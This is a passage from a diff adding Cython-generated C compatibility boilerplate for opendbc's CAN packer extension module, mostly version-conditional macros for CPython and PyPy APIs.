PyObject*)ob)->ob_type == (type)) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_Is) + #define __Pyx_Py_Is(x, y) Py_Is(x, y) +#else + #define __Pyx_Py_Is(x, y) ((x) == (y)) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_IsNone) + #define __Pyx_Py_IsNone(ob) Py_IsNone(ob) +#else + #define __Pyx_Py_IsNone(ob) __Pyx_Py_Is((ob), Py_None) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_IsTrue) + #define __Pyx_Py_IsTrue(ob) Py_IsTrue(ob) +#else + #define __Pyx_Py_IsTrue(ob) __Pyx_Py_Is((ob), Py_True) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_IsFalse) + #define __Pyx_Py_IsFalse(ob) Py_IsFalse(ob) +#else + #define __Pyx_Py_IsFalse(ob) __Pyx_Py_Is((ob), Py_False) +#endif +#define __Pyx_NoneAsNull(obj) (__Pyx_Py_IsNone(obj) ? NULL : (obj)) +#if PY_VERSION_HEX >= 0x030900F0 && !CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyObject_GC_IsFinalized(o) PyObject_GC_IsFinalized(o) +#else + #define __Pyx_PyObject_GC_IsFinalized(o) _PyGC_FINALIZED(o) +#endif +#ifndef CO_COROUTINE + #define CO_COROUTINE 0x80 +#endif +#ifndef CO_ASYNC_GENERATOR + #define CO_ASYNC_GENERATOR 0x200 +#endif +#ifndef Py_TPFLAGS_CHECKTYPES + #define Py_TPFLAGS_CHECKTYPES 0 +#endif +#ifndef Py_TPFLAGS_HAVE_INDEX + #define Py_TPFLAGS_HAVE_INDEX 0 +#endif +#ifndef Py_TPFLAGS_HAVE_NEWBUFFER + #define Py_TPFLAGS_HAVE_NEWBUFFER 0 +#endif +#ifndef Py_TPFLAGS_HAVE_FINALIZE + #define Py_TPFLAGS_HAVE_FINALIZE 0 +#endif +#ifndef Py_TPFLAGS_SEQUENCE + #define Py_TPFLAGS_SEQUENCE 0 +#endif +#ifndef Py_TPFLAGS_MAPPING + #define Py_TPFLAGS_MAPPING 0 +#endif +#ifndef METH_STACKLESS + #define METH_STACKLESS 0 +#endif +#if PY_VERSION_HEX <= 0x030700A3 || !defined(METH_FASTCALL) + #ifndef METH_FASTCALL + #define METH_FASTCALL 0x80 + #endif + typedef PyObject *(*__Pyx_PyCFunctionFast) (PyObject *self, PyObject *const *args, Py_ssize_t nargs); + typedef PyObject *(*__Pyx_PyCFunctionFastWithKeywords) (PyObject *self, PyObject *const *args, + Py_ssize_t nargs, PyObject *kwnames); +#else + #define __Pyx_PyCFunctionFast _PyCFunctionFast + #define __Pyx_PyCFunctionFastWithKeywords _PyCFunctionFastWithKeywords +#endif +#if CYTHON_METH_FASTCALL + #define __Pyx_METH_FASTCALL METH_FASTCALL + #define __Pyx_PyCFunction_FastCall __Pyx_PyCFunctionFast + #define __Pyx_PyCFunction_FastCallWithKeywords __Pyx_PyCFunctionFastWithKeywords +#else + #define __Pyx_METH_FASTCALL METH_VARARGS + #define __Pyx_PyCFunction_FastCall PyCFunction + #define __Pyx_PyCFunction_FastCallWithKeywords PyCFunctionWithKeywords +#endif +#if CYTHON_VECTORCALL + #define __pyx_vectorcallfunc vectorcallfunc + #define __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET PY_VECTORCALL_ARGUMENTS_OFFSET + #define __Pyx_PyVectorcall_NARGS(n) PyVectorcall_NARGS((size_t)(n)) +#elif CYTHON_BACKPORT_VECTORCALL + typedef PyObject *(*__pyx_vectorcallfunc)(PyObject *callable, PyObject *const *args, + size_t nargsf, PyObject *kwnames); + #define __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET ((size_t)1 << (8 * sizeof(size_t) - 1)) + #define __Pyx_PyVectorcall_NARGS(n) ((Py_ssize_t)(((size_t)(n)) & ~__Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET)) +#else + #define __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET 0 + #define __Pyx_PyVectorcall_NARGS(n) ((Py_ssize_t)(n)) +#endif +#if PY_VERSION_HEX < 0x030900B1 + #define __Pyx_PyType_FromModuleAndSpec(m, s, b) ((void)m, PyType_FromSpecWithBases(s, b)) + typedef PyObject *(*__Pyx_PyCMethod)(PyObject *, PyTypeObject *, PyObject *const *, size_t, PyObject *); +#else + #define __Pyx_PyType_FromModuleAndSpec(m, s, b) PyType_FromModuleAndSpec(m, s, b) + #define __Pyx_PyCMethod PyCMethod +#endif +#ifndef METH_METHOD + #define METH_METHOD 0x200 +#endif +#if CYTHON_COMPILING_IN_PYPY && !defined(PyObject_Malloc) + #define PyObject_Malloc(s) PyMem_Malloc(s) + #define PyObject_Free(p) PyMem_Free(p) + #define PyObject_Realloc(p) PyMem_Realloc(p) +#endif +#if CYTHON_COMPILING_IN_LIMITED_API + #define __Pyx_PyCode_HasFreeVars(co) (PyCode_GetNumFree(co) > 0) + #define __Pyx_PyFrame_SetLineNumber(frame, lineno) +#else + #define __Pyx_PyCode_HasFreeVars(co) (PyCode_GetNumFree(co) > 0) + #define __Pyx_PyFrame_SetLineNumber(frame, lineno) (frame)->f_lineno = (lineno) +#endif +#if CYTHON_COMPILING_IN_LIMITED_API + #define __Pyx_PyThreadState_Current PyThreadState_Get() +#elif !CYTHON_FAST_THREAD_STATE + #define __Pyx_PyThreadState_Current PyThreadState_GET() +#elif PY_VERSION_HEX >= 0x03060000 + #define __Pyx_PyThreadState_Current _PyThreadState_UncheckedGet() +#elif PY_VERSION_HEX >= 0x03000000 + #define __Pyx_PyThreadState_Current PyThreadState_GET() +#else + #define __Pyx_PyThreadState_Current _PyThreadState_Current +#endif +#if CYTHON_COMPILING_IN_LIMITED_API +static CYTHON_INLINE void *__Pyx_PyModule_GetState(PyObject *op) +{ + void *result; + result = PyModule_GetState(op); + if (!result) + Py_FatalError("Couldn't find the module state"); + return result; +} +#endif +#define __Pyx_PyObject_GetSlot(obj, name, func_ctype) __Pyx_PyType_GetSlot(Py_TYPE(obj), name, func_ctype) +#if CYTHON_COMPILING_IN_LIMITED_API + #define __Pyx_PyType_GetSlot(type, name, func_ctype) ((func_ctype) PyType_GetSlot((type), Py_##name)) +#else + #define __Pyx_PyType_GetSlot(type, name, func_ctype) ((type)->name) +#endif +#if PY_VERSION_HEX < 0x030700A2 && !defined(PyThread_tss_create) && !defined(Py_tss_NEEDS_INIT) +#include "pythread.h" +#define Py_tss_NEEDS_INIT 0 +typedef int Py_tss_t; +static CYTHON_INLINE int PyThread_tss_create(Py_tss_t *key) { + *key = PyThread_create_key(); + return 0; +} +static CYTHON_INLINE Py_tss_t * PyThread_tss_alloc(void) { + Py_tss_t *key = (Py_tss_t *)PyObject_Malloc(sizeof(Py_tss_t)); + *key = Py_tss_NEEDS_INIT; + return key; +} +static CYTHON_INLINE void PyThread_tss_free(Py_tss_t *key) { + PyObject_Free(key); +} +static CYTHON_INLINE int PyThread_tss_is_created(Py_tss_t *key) { + return *key != Py_tss_NEEDS_INIT; +} +static CYTHON_INLINE void PyThread_tss_delete(Py_tss_t *key) { + PyThread_delete_key(*key); + *key = Py_tss_NEEDS_INIT; +} +static CYTHON_INLINE int PyThread_tss_set(Py_tss_t *key, void *value) { + return PyThread_set_key_value(*key, value); +} +static CYTHON_INLINE void * PyThread_tss_get(Py_tss_t *key) { + return PyThread_get_key_value(*key); +} +#endif +#if PY_MAJOR_VERSION < 3 + #if CYTHON_COMPILING_IN_PYPY + #if PYPY_VERSION_NUM < 0x07030600 + #if defined(__cplusplus) && __cplusplus >= 201402L + [[deprecated("`with nogil:` inside a nogil function will not release the GIL in PyPy2 < 7.3.6")]] + #elif defined(__GNUC__) || defined(__clang__) + __attribute__ ((__deprecated__("`with nogil:` inside a nogil function will not release the GIL in PyPy2 < 7.3.6"))) + #elif defined(_MSC_VER) + __declspec(deprecated("`with nogil:` inside a nogil function will not release the GIL in PyPy2 < 7.3.6")) + #endif + static CYTHON_INLINE int PyGILState_Check(void) { + return 0; + } + #else // PYPY_VERSION_NUM < 0x07030600 + #endif // PYPY_VERSION_NUM < 0x07030600 + #else + static CYTHON_INLINE int PyGILState_Check(void) { + PyThreadState * tstate = _PyThreadState_Current; + return tstate && (tstate == PyGILState_GetThisThreadState()); + } + #endif +#endif +#if CYTHON_COMPILING_IN_CPYTHON || defined(_PyDict_NewPresized) +#define __Pyx_PyDict_NewPresized(n) ((n <= 8) ? PyDict_New() : _PyDict_NewPresized(n)) +#else +#define __Pyx_PyDict_NewPresized(n) PyDict_New() +#endif +#if PY_MAJOR_VERSION >= 3 || CYTHON_FUTURE_DIVISION + #define __Pyx_PyNumber_Divide(x,y) PyNumber_TrueDivide(x,y) + #define __Pyx_PyNumber_InPlaceDivide(x,y) PyNumber_InPlaceTrueDivide(x,y) +#else + #define __Pyx_PyNumber_Divide(x,y) PyNumber_Divide(x,y) + #define __Pyx_PyNumber_InPlaceDivide(x,y) PyNumber_InPlaceDivide(x,y) +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX > 0x030600B4 && CYTHON_USE_UNICODE_INTERNALS +#define __Pyx_PyDict_GetItemStrWithError(dict, name) _PyDict_GetItem_KnownHash(dict, name, ((PyASCIIObject *) name)->hash) +static CYTHON_INLINE PyObject * __Pyx_PyDict_GetItemStr(PyObject *dict, PyObject *name) { + PyObject *res = __Pyx_PyDict_GetItemStrWithError(dict, name); + if (res == NULL) PyErr_Clear(); + return res; +} +#elif PY_MAJOR_VERSION >= 3 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07020000) +#define __Pyx_PyDict_GetItemStrWithError PyDict_GetItemWithError +#define __Pyx_PyDict_GetItemStr PyDict_GetItem +#else +static CYTHON_INLINE PyObject * __Pyx_PyDict_GetItemStrWithError(PyObject *dict, PyObject *name) { +#if CYTHON_COMPILING_IN_PYPY + return PyDict_GetItem(dict, name); +#else + PyDictEntry *ep; + PyDictObject *mp = (PyDictObject*) dict; + long hash = ((PyStringObject *) name)->ob_shash; + assert(hash != -1); + ep = (mp->ma_lookup)(mp, name, hash); + if (ep == NULL) { + return NULL; + } + return ep->me_value; +#endif +} +#define __Pyx_PyDict_GetItemStr PyDict_GetItem +#endif +#if CYTHON_USE_TYPE_SLOTS + #define __Pyx_PyType_GetFlags(tp) (((PyTypeObject *)tp)->tp_flags) + #define __Pyx_PyType_HasFeature(type, feature) ((__Pyx_PyType_GetFlags(type) & (feature)) != 0) + #define __Pyx_PyObject_GetIterNextFunc(obj) (Py_TYPE(obj)->tp_iternext) +#else + #define __Pyx_PyType_GetFlags(tp) (PyType_GetFlags((PyTypeObject *)tp)) + #define __Pyx_PyType_HasFeature(type, feature) PyType_HasFeature(type, feature) + #define __Pyx_PyObject_GetIterNextFunc(obj) PyIter_Next +#endif +#if CYTHON_USE_TYPE_SPECS && PY_VERSION_HEX >= 0x03080000 +#define __Pyx_PyHeapTypeObject_GC_Del(obj) {\ + PyTypeObject *type = Py_TYPE(obj);\ + assert(__Pyx_PyType_HasFeature(type, Py_TPFLAGS_HEAPTYPE));\ + PyObject_GC_Del(obj);\ + Py_DECREF(type);\ +} +#else +#define __Pyx_PyHeapTypeObject_GC_Del(obj) PyObject_GC_Del(obj) +#endif +#if CYTHON_COMPILING_IN_LIMITED_API + #define CYTHON_PEP393_ENABLED 1 + #define __Pyx_PyUnicode_READY(op) (0) + #define __Pyx_PyUnicode_GET_LENGTH(u) PyUnicode_GetLength(u) + #define __Pyx_PyUnicode_READ_CHAR(u, i) PyUnicode_ReadChar(u, i) + #define __Pyx_PyUnicode_MAX_CHAR_VALUE(u) ((void)u, 1114111U) + #define __Pyx_PyUnicode_KIND(u) ((void)u, (0)) + #define __Pyx_PyUnicode_DATA(u) ((void*)u) + #define __Pyx_PyUnicode_READ(k, d, i) ((void)k, PyUnicode_ReadChar((PyObject*)(d), i)) + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != PyUnicode_GetLength(u)) +#elif PY_VERSION_HEX > 0x03030000 && defined(PyUnicode_KIND) + #define CYTHON_PEP393_ENABLED 1 + #if PY_VERSION_HEX >= 0x030C0000 + #define __Pyx_PyUnicode_READY(op) (0) + #else + #define __Pyx_PyUnicode_READY(op) (likely(PyUnicode_IS_READY(op)) ?\ + 0 : _PyUnicode_Ready((PyObject *)(op))) + #endif + #define __Pyx_PyUnicode_GET_LENGTH(u) PyUnicode_GET_LENGTH(u) + #define __Pyx_PyUnicode_READ_CHAR(u, i) PyUnicode_READ_CHAR(u, i) + #define __Pyx_PyUnicode_MAX_CHAR_VALUE(u) PyUnicode_MAX_CHAR_VALUE(u) + #define __Pyx_PyUnicode_KIND(u) ((int)PyUnicode_KIND(u)) + #define __Pyx_PyUnicode_DATA(u) PyUnicode_DATA(u) + #define __Pyx_PyUnicode_READ(k, d, i) PyUnicode_READ(k, d, i) + #define __Pyx_PyUnicode_WRITE(k, d, i, ch) PyUnicode_WRITE(k, d, i, (Py_UCS4) ch) + #if PY_VERSION_HEX >= 0x030C0000 + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != PyUnicode_GET_LENGTH(u)) + #else + #if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x03090000 + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != (likely(PyUnicode_IS_READY(u)) ? PyUnicode_GET_LENGTH(u) : ((PyCompactUnicodeObject *)(u))->wstr_length)) + #else + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != (likely(PyUnicode_IS_READY(u)) ? PyUnicode_GET_LENGTH(u) : PyUnicode_GET_SIZE(u))) + #endif + #endif +#else + #define CYTHON_PEP393_ENABLED 0 + #define PyUnicode_1BYTE_KIND 1 + #define PyUnicode_2BYTE_KIND 2 + #define PyUnicode_4BYTE_KIND 4 + #define __Pyx_PyUnicode_READY(op) (0) + #define __Pyx_PyUnicode_GET_LENGTH(u) PyUnicode_GET_SIZE(u) + #define __Pyx_PyUnicode_READ_CHAR(u, i) ((Py_UCS4)(PyUnicode_AS_UNICODE(u)[i])) + #define __Pyx_PyUnicode_MAX_CHAR_VALUE(u) ((sizeof(Py_UNICODE) == 2) ? 65535U : 1114111U) + #define __Pyx_PyUnicode_KIND(u) ((int)sizeof(Py_UNICODE)) + #define __Pyx_PyUnicode_DATA(u) ((void*)PyUnicode_AS_UNICODE(u)) + #define __Pyx_PyUnicode_READ(k, d, i) ((void)(k), (Py_UCS4)(((Py_UNICODE*)d)[i])) + #define __Pyx_PyUnicode_WRITE(k, d, i, ch) (((void)(k)), ((Py_UNICODE*)d)[i] = (Py_UNICODE) ch) + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != PyUnicode_GET_SIZE(u)) +#endif +#if CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyUnicode_Concat(a, b) PyNumber_Add(a, b) + #define __Pyx_PyUnicode_ConcatSafe(a, b) PyNumber_Add(a, b) +#else + #define __Pyx_PyUnicode_Concat(a, b) PyUnicode_Concat(a, b) + #define __Pyx_PyUnicode_ConcatSafe(a, b) ((unlikely((a) == Py_None) || unlikely((b) == Py_None)) ?\ + PyNumber_Add(a, b) : __Pyx_PyUnicode_Concat(a, b)) +#endif +#if CYTHON_COMPILING_IN_PYPY + #if !defined(PyUnicode_DecodeUnicodeEscape) + #define PyUnicode_DecodeUnicodeEscape(s, size, errors) PyUnicode_Decode(s, size, "unicode_escape", errors) + #endif + #if !defined(PyUnicode_Contains) || (PY_MAJOR_VERSION == 2 && PYPY_VERSION_NUM < 0x07030500) + #undef PyUnicode_Contains + #define PyUnicode_Contains(u, s) PySequence_Contains(u, s) + #endif + #if !defined(PyByteArray_Check) + #define PyByteArray_Check(obj) PyObject_TypeCheck(obj, &PyByteArray_Type) + #endif + #if !defined(PyObject_Format) + #define PyObject_Format(obj, fmt) PyObject_CallMethod(obj, "__format__", "O", fmt) + #endif +#endif +#define __Pyx_PyString_FormatSafe(a, b) ((unlikely((a) == Py_None || (PyString_Check(b) && !PyString_CheckExact(b)))) ? PyNumber_Remainder(a, b) : __Pyx_PyString_Format(a, b)) +#define __Pyx_PyUnicode_FormatSafe(a, b) ((unlikely((a) == Py_None || (PyUnicode_Check(b) && !PyUnicode_CheckExact(b)))) ? PyNumber_Remainder(a, b) : PyUnicode_Format(a, b)) +#if PY_MAJOR_VERSION >= 3 + #define __Pyx_PyString_Format(a, b) PyUnicode_Format(a, b) +#else + #define __Pyx_PyString_Format(a, b) PyString_Format(a, b) +#endif +#if PY_MAJOR_VERSION < 3 && !defined(PyObject_ASCII) + #define PyObject_ASCII(o) PyObject_Repr(o) +#endif +#if PY_MAJOR_VERSION >= 3 + #define PyBaseString_Type PyUnicode_Type + #define PyStringObject PyUnicodeObject + #define PyString_Type PyUnicode_Type + #define PyString_Check PyUnicode_Check + #define PyString_CheckExact PyUnicode_CheckExact +#ifndef PyObject_Unicode + #define PyObject_Unicode PyObject_Str +#endif +#endif +#if PY_MAJOR_VERSION >= 3 + #define __Pyx_PyBaseString_Check(obj) PyUnicode_Check(obj) + #define __Pyx_PyBaseString_CheckExact(obj) PyUnicode_CheckExact(obj) +#else + #define __Pyx_PyBaseString_Check(obj) (PyString_Check(obj) || PyUnicode_Check(obj)) + #define __Pyx_PyBaseString_CheckExact(obj) (PyString_CheckExact(obj) || PyUnicode_CheckExact(obj)) +#endif +#if CYTHON_COMPILING_IN_CPYTHON + #define __Pyx_PySequence_ListKeepNew(obj)\ + (likely(PyList_CheckExact(obj) && Py_REFCNT(obj) == 1) ? __Pyx_NewRef(obj) : PySequence_List(obj)) +#else + #define __Pyx_PySequence_ListKeepNew(obj) PySequence_List(obj) +#endif +#ifndef PySet_CheckExact + #define PySet_CheckExact(obj) __Pyx_IS_TYPE(obj, &PySet_Type) +#endif +#if PY_VERSION_HEX >= 0x030900A4 + #define __Pyx_SET_REFCNT(obj, refcnt) Py_SET_REFCNT(obj, refcnt) + #define __Pyx_SET_SIZE(obj, size) Py_SET_SIZE(obj, size) +#else + #define __Pyx_SET_REFCNT(obj, refcnt) Py_REFCNT(obj) = (refcnt) + #define __Pyx_SET_SIZE(obj, size) Py_SIZE(obj) = (size) +#endif +#if CYTHON_ASSUME_SAFE_MACROS + #define __Pyx_PySequence_SIZE(seq) Py_SIZE(seq) +#else + #define __Pyx_PySequence_SIZE(seq) PySequence_Size(seq) +#endif +#if PY_MAJOR_VERSION >= 3 + #define PyIntObject PyLongObject + #define PyInt_Type PyLong_Type + #define PyInt_Check(op) PyLong_Check(op) + #define PyInt_CheckExact(op) PyLong_CheckExact(op) + #define __Pyx_Py3Int_Check(op) PyLong_Check(op) + #define __Pyx_Py3Int_CheckExact(op) PyLong_CheckExact(op) + #define PyInt_FromString PyLong_FromString + #define PyInt_FromUnicode PyLong_FromUnicode + #define PyInt_FromLong PyLong_FromLong + #define PyInt_FromSize_t PyLong_FromSize_t + #define PyInt_FromSsize_t PyLong_FromSsize_t + #define PyInt_AsLong PyLong_AsLong + #define PyInt_AS_LONG PyLong_AS_LONG + #define PyInt_AsSsize_t PyLong_AsSsize_t + #define PyInt_AsUnsignedLongMask PyLong_AsUnsignedLongMask + #define PyInt_AsUnsignedLongLongMask PyLong_AsUnsignedLongLongMask + #define PyNumber_Int PyNumber_Long +#else + #define __Pyx_Py3Int_Check(op) (PyLong_Check(op) || PyInt_Check(op)) + #define __Pyx_Py3Int_CheckExact(op) (PyLong_CheckExact(op) || PyInt_CheckExact(op)) +#endif +#if PY_MAJOR_VERSION >= 3 + #define PyBoolObject PyLongObject +#endif +#if PY_MAJOR_VERSION >= 3 && CYTHON_COMPILING_IN_PYPY + #ifndef PyUnicode_InternFromString + #define PyUnicode_InternFromString(s) PyUnicode_FromString(s) + #endif +#endif +#if PY_VERSION_HEX < 0x030200A4 + typedef long Py_hash_t; + #define __Pyx_PyInt_FromHash_t PyInt_FromLong + #define __Pyx_PyInt_AsHash_t __Pyx_PyIndex_AsHash_t +#else + #define __Pyx_PyInt_FromHash_t PyInt_FromSsize_t + #define __Pyx_PyInt_AsHash_t __Pyx_PyIndex_AsSsize_t +#endif +#if CYTHON_USE_ASYNC_SLOTS + #if PY_VERSION_HEX >= 0x030500B1 + #define __Pyx_PyAsyncMethodsStruct PyAsyncMethods + #define __Pyx_PyType_AsAsync(obj) (Py_TYPE(obj)->tp_as_async) + #else + #define __Pyx_PyType_AsAsync(obj) ((__Pyx_PyAsyncMethodsStruct*) (Py_TYPE(obj)->tp_reserved)) + #endif +#else + #define __Pyx_PyType_AsAsync(obj) NULL +#endif +#ifndef __Pyx_PyAsyncMethodsStruct + typedef struct { + unaryfunc am_await; + unaryfunc am_aiter; + unaryfunc am_anext; + } __Pyx_PyAsyncMethodsStruct; +#endif + +#if defined(_WIN32) || defined(WIN32) || defined(MS_WINDOWS) + #if !defined(_USE_MATH_DEFINES) + #define _USE_MATH_DEFINES + #endif +#endif +#include +#ifdef NAN +#define __PYX_NAN() ((float) NAN) +#else +static CYTHON_INLINE float __PYX_NAN() { + float value; + memset(&value, 0xFF, sizeof(value)); + return value; +} +#endif +#if defined(__CYGWIN__) && defined(_LDBL_EQ_DBL) +#define __Pyx_truncl trunc +#else +#define __Pyx_truncl truncl +#endif + +#define __PYX_MARK_ERR_POS(f_index, lineno) \ + { __pyx_filename = __pyx_f[f_index]; (void)__pyx_filename; __pyx_lineno = lineno; (void)__pyx_lineno; __pyx_clineno = __LINE__; (void)__pyx_clineno; } +#define __PYX_ERR(f_index, lineno, Ln_error) \ + { __PYX_MARK_ERR_POS(f_index, lineno) goto Ln_error; } + +#ifdef CYTHON_EXTERN_C + #undef __PYX_EXTERN_C + #define __PYX_EXTERN_C CYTHON_EXTERN_C +#elif defined(__PYX_EXTERN_C) + #ifdef _MSC_VER + #pragma message ("Please do not define the '__PYX_EXTERN_C' macro externally. Use 'CYTHON_EXTERN_C' instead.") + #else + #warning Please do not define the '__PYX_EXTERN_C' macro externally. Use 'CYTHON_EXTERN_C' instead. + #endif +#else + #define __PYX_EXTERN_C extern "C++" +#endif + +#define __PYX_HAVE__opendbc__can__packer_pyx +#define __PYX_HAVE_API__opendbc__can__packer_pyx +/* Early includes */ +#include +#include "ios" +#include "new" +#include "stdexcept" +#include "typeinfo" +#include +#include + + #if __cplusplus >= 201103L || (defined(_MSC_VER) && _MSC_VER >= 1600) + // move should be defined for these versions of MSVC, but __cplusplus isn't set usefully + #include + + namespace cython_std { + template typename std::remove_reference::type&& move(T& t) noexcept { return std::move(t); } + template typename std::remove_reference::type&& move(T&& t) noexcept { return std::move(t); } + } + + #endif + +#include +#include +#include +#include "common_dbc.h" +#include "common.h" +#ifdef _OPENMP +#include +#endif /* _OPENMP */ + +#if defined(PYREX_WITHOUT_ASSERTIONS) && !defined(CYTHON_WITHOUT_ASSERTIONS) +#define CYTHON_WITHOUT_ASSERTIONS +#endif + +typedef struct {PyObject **p; const char *s; const Py_ssize_t n; const char* encoding; + const char is_unicode; const char is_str; const char intern; } __Pyx_StringTabEntry; + +#define __PYX_DEFAULT_STRING_ENCODING_IS_ASCII 1 +#define __PYX_DEFAULT_STRING_ENCODING_IS_UTF8 0 +#define __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT (PY_MAJOR_VERSION >= 3 && __PYX_DEFAULT_STRING_ENCODING_IS_UTF8) +#define __PYX_DEFAULT_STRING_ENCODING "ascii" +#define __Pyx_PyObject_FromString __Pyx_PyBytes_FromString +#define __Pyx_PyObject_FromStringAndSize __Pyx_PyBytes_FromStringAndSize +#define __Pyx_uchar_cast(c) ((unsigned char)c) +#define __Pyx_long_cast(x) ((long)x) +#define __Pyx_fits_Py_ssize_t(v, type, is_signed) (\ + (sizeof(type) < sizeof(Py_ssize_t)) ||\ + (sizeof(type) > sizeof(Py_ssize_t) &&\ + likely(v < (type)PY_SSIZE_T_MAX ||\ + v == (type)PY_SSIZE_T_MAX) &&\ + (!is_signed || likely(v > (type)PY_SSIZE_T_MIN ||\ + v == (type)PY_SSIZE_T_MIN))) ||\ + (sizeof(type) == sizeof(Py_ssize_t) &&\ + (is_signed || likely(v < (type)PY_SSIZE_T_MAX ||\ + v == (type)PY_SSIZE_T_MAX))) ) +static CYTHON_INLINE int __Pyx_is_valid_index(Py_ssize_t i, Py_ssize_t limit) { + return (size_t) i < (size_t) limit; +} +#if defined (__cplusplus) && __cplusplus >= 201103L + #include + #define __Pyx_sst_abs(value) std::abs(value) +#elif SIZEOF_INT >= SIZEOF_SIZE_T + #define __Pyx_sst_abs(value) abs(value) +#elif SIZEOF_LONG >= SIZEOF_SIZE_T + #define __Pyx_sst_abs(value) labs(value) +#elif defined (_MSC_VER) + #define __Pyx_sst_abs(value) ((Py_ssize_t)_abs64(value)) +#elif defined (__STDC_VERSION__) && __STDC_VERSION__ >= 199901L + #define __Pyx_sst_abs(value) llabs(value) +#elif defined (__GNUC__) + #define __Pyx_sst_abs(value) __builtin_llabs(value) +#else + #define __Pyx_sst_abs(value) ((value<0) ? -value : value) +#endif +static CYTHON_INLINE const char* __Pyx_PyObject_AsString(PyObject*); +static CYTHON_INLINE const char* __Pyx_PyObject_AsStringAndSize(PyObject*, Py_ssize_t* length); +#define __Pyx_PyByteArray_FromString(s) PyByteArray_FromStringAndSize((const char*)s, strlen((const char*)s)) +#define __Pyx_PyByteArray_FromStringAndSize(s, l) PyByteArray_FromStringAndSize((const char*)s, l) +#define __Pyx_PyBytes_FromString PyBytes_FromString +#define __Pyx_PyBytes_FromStringAndSize PyBytes_FromStringAndSize +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_FromString(const char*); +#if PY_MAJOR_VERSION < 3 + #define __Pyx_PyStr_FromString __Pyx_PyBytes_FromString + #define __Pyx_PyStr_FromStringAndSize __Pyx_PyBytes_FromStringAndSize +#else + #define __Pyx_PyStr_FromString __Pyx_PyUnicode_FromString + #define __Pyx_PyStr_FromStringAndSize __Pyx_PyUnicode_FromStringAndSize +#endif +#define __Pyx_PyBytes_AsWritableString(s) ((char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsWritableSString(s) ((signed char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsWritableUString(s) ((unsigned char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsString(s) ((const char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsSString(s) ((const signed char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsUString(s) ((const unsigned char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyObject_AsWritableString(s) ((char*)(__pyx_uintptr_t) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsWritableSString(s) ((signed char*)(__pyx_uintptr_t) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsWritableUString(s) ((unsigned char*)(__pyx_uintptr_t) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsSString(s) ((const signed char*) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsUString(s) ((const unsigned char*) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_FromCString(s) __Pyx_PyObject_FromString((const char*)s) +#define __Pyx_PyBytes_FromCString(s) __Pyx_PyBytes_FromString((const char*)s) +#define __Pyx_PyByteArray_FromCString(s) __Pyx_PyByteArray_FromString((const char*)s) +#define __Pyx_PyStr_FromCString(s) __Pyx_PyStr_FromString((const char*)s) +#define __Pyx_PyUnicode_FromCString(s) __Pyx_PyUnicode_FromString((const char*)s) +#if CYTHON_COMPILING_IN_LIMITED_API +static CYTHON_INLINE size_t __Pyx_Py_UNICODE_strlen(const wchar_t *u) +{ + const wchar_t *u_end = u; + while (*u_end++) ; + return (size_t)(u_end - u - 1); +} +#else +static CYTHON_INLINE size_t __Pyx_Py_UNICODE_strlen(const Py_UNICODE *u) +{ + const Py_UNICODE *u_end = u; + while (*u_end++) ; + return (size_t)(u_end - u - 1); +} +#endif +#define __Pyx_PyUnicode_FromOrdinal(o) PyUnicode_FromOrdinal((int)o) +#define __Pyx_PyUnicode_FromUnicode(u) PyUnicode_FromUnicode(u, __Pyx_Py_UNICODE_strlen(u)) +#define __Pyx_PyUnicode_FromUnicodeAndLength PyUnicode_FromUnicode +#define __Pyx_PyUnicode_AsUnicode PyUnicode_AsUnicode +#define __Pyx_NewRef(obj) (Py_INCREF(obj), obj) +#define __Pyx_Owned_Py_None(b) __Pyx_NewRef(Py_None) +static CYTHON_INLINE PyObject * __Pyx_PyBool_FromLong(long b); +static CYTHON_INLINE int __Pyx_PyObject_IsTrue(PyObject*); +static CYTHON_INLINE int __Pyx_PyObject_IsTrueAndDecref(PyObject*); +static CYTHON_INLINE PyObject* __Pyx_PyNumber_IntOrLong(PyObject* x); +#define __Pyx_PySequence_Tuple(obj)\ + (likely(PyTuple_CheckExact(obj)) ? __Pyx_NewRef(obj) : PySequence_Tuple(obj)) +static CYTHON_INLINE Py_ssize_t __Pyx_PyIndex_AsSsize_t(PyObject*); +static CYTHON_INLINE PyObject * __Pyx_PyInt_FromSize_t(size_t); +static CYTHON_INLINE Py_hash_t __Pyx_PyIndex_AsHash_t(PyObject*); +#if CYTHON_ASSUME_SAFE_MACROS +#define __pyx_PyFloat_AsDouble(x) (PyFloat_CheckExact(x) ? PyFloat_AS_DOUBLE(x) : PyFloat_AsDouble(x)) +#else +#define __pyx_PyFloat_AsDouble(x) PyFloat_AsDouble(x) +#endif +#define __pyx_PyFloat_AsFloat(x) ((float) __pyx_PyFloat_AsDouble(x)) +#if PY_MAJOR_VERSION >= 3 +#define __Pyx_PyNumber_Int(x) (PyLong_CheckExact(x) ? __Pyx_NewRef(x) : PyNumber_Long(x)) +#else +#define 